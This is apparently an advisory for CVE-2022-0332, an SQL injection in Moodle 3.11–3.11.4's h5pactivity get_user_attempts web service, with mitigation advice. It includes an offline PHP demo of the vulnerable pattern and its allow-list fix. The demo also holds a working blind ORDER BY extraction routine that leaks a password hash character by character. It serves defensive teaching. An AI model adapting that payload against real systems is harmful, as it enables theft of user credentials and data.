vendor: Moodle
by: lavclash75
CVSS: 9.8 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: Moodle
Affected Version From: Moodle 3.11
Affected Version To: Moodle 3.11.4
Patch Exists: YES
Related CVE: CVE-2022-0332
CPE: a:moodle:moodle:3.11.4
Platforms Tested:
2022
Moodle 3.11.4 – SQL Injection
Moodle 3.11 through 3.11.4 is vulnerable to SQL injection because of insufficient validation of a request parameter in the web service implemented by mod/h5pactivity/classes/external/get_user_attempts.php (the mod_h5pactivity_get_user_attempts external function). An attacker who can invoke that web service (Moodle web service calls are authenticated, so in practice a user holding a valid session or web service token) can send a specially crafted request whose parameter value is placed into the SQL statement and executed by the database. Depending on the database backend and the privileges of the Moodle database account, this can be used to read data the caller is not authorised to see, such as user records and password hashes, or to modify the database.
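The pattern behind this class of bug, shown as an added illustration that is not Moodle's code: one query parameter is bound correctly while a second one is concatenated into the SQL text. It assumes the unvalidated input is a sort-direction string (the advisory does not name the parameter; "sortorder" here is an assumption), uses PDO with an in-memory SQLite database instead of Moodle's $DB API, and the tables, rows and fake password hash are constructed for the demonstration. The blind oracle shows why an ORDER BY injection is not harmless: the attacker needs no stacked queries or UNION, only the ability to flip the sort direction on a condition.

```php
<?php
// Added example for this advisory; not Moodle's code and not Moodle's $DB API.
// Runs offline with PDO + SQLite. ASSUMPTION: the unvalidated input is a
// sort-direction string ("sortorder"); the advisory does not name the parameter.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample data: a user table with a (fake) password hash and an
// attempts table for the user whose attempts the caller is allowed to see.
$pdo->exec("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$pdo->exec("CREATE TABLE h5pactivity_attempts (id INTEGER PRIMARY KEY, userid INTEGER, attempt INTEGER)");
$pdo->exec("INSERT INTO user VALUES (2, 'admin', 'Zx9')");
$pdo->exec("INSERT INTO h5pactivity_attempts VALUES (1, 5, 1), (2, 5, 2), (3, 5, 3)");

// VULNERABLE pattern: userid is bound through a placeholder, but the sort
// direction is interpolated into the SQL text, so it is executed as SQL.
function get_attempts_vulnerable(PDO $pdo, int $userid, string $sortorder): array {
    $sql = "SELECT attempt FROM h5pactivity_attempts WHERE userid = :userid ORDER BY attempt $sortorder";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':userid' => $userid]);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// FIXED pattern: an ORDER BY direction cannot be a bound placeholder, so the
// correct control is an allow-list of the two values the query can take,
// rejecting everything else before any SQL is built.
function get_attempts_fixed(PDO $pdo, int $userid, string $sortorder): array {
    $sortorder = strtoupper($sortorder);
    if (!in_array($sortorder, ['ASC', 'DESC'], true)) {
        throw new InvalidArgumentException('sortorder must be ASC or DESC');
    }
    $sql = "SELECT attempt FROM h5pactivity_attempts WHERE userid = :userid ORDER BY attempt $sortorder";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':userid' => $userid]);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Blind, boolean-based extraction through ORDER BY: the payload keeps the
// statement valid but multiplies the sort key by +1 or -1 depending on a
// subquery, so the order of the returned rows leaks one character of another
// user's password hash per request.
function leak_char(PDO $pdo, int $pos, string $alphabet): ?string {
    foreach (str_split($alphabet) as $c) {
        $cond = "(SELECT substr(password, $pos, 1) FROM user WHERE username = 'admin') = '$c'";
        $payload = "* (CASE WHEN $cond THEN 1 ELSE -1 END)";
        $rows = get_attempts_vulnerable($pdo, 5, $payload);
        if ($rows === [1, 2, 3]) {   // ascending order means the condition held
            return $c;
        }
    }
    return null;
}

$alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$leaked = '';
for ($pos = 1; $pos <= 3; $pos++) {
    $leaked .= leak_char($pdo, $pos, $alphabet) ?? '?';
}
echo "vulnerable: leaked '$leaked' through the ORDER BY oracle\n";

try {
    get_attempts_fixed($pdo, 5, "* (CASE WHEN 1=1 THEN 1 ELSE -1 END)");
} catch (InvalidArgumentException $e) {
    echo "fixed: payload rejected (" . $e->getMessage() . ")\n";
}
```

Run it with `php example.php`: the vulnerable function recovers the three-character secret one request per candidate character, while the fixed function refuses the payload before touching the database. In Moodle code the equivalent place for the allow-list check is the external function's parameter handling (raising invalid_parameter_exception for anything other than the permitted values), and the same rule applies to any identifier the query needs from the caller, such as column names or sort fields.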
Mitigation:
The vendor has released a fix: upgrade to Moodle 3.11.5 or later (Moodle tracks this issue as security advisory MSA-22-0001). Until the upgrade is applied, limiting who can use the affected web service (for example by restricting or temporarily disabling the mobile web service that exposes the h5pactivity functions) reduces exposure, at the cost of mobile app functionality. After upgrading, confirm the running version reports 3.11.5 or later and review database and web service logs for unusual calls to the get_user_attempts function.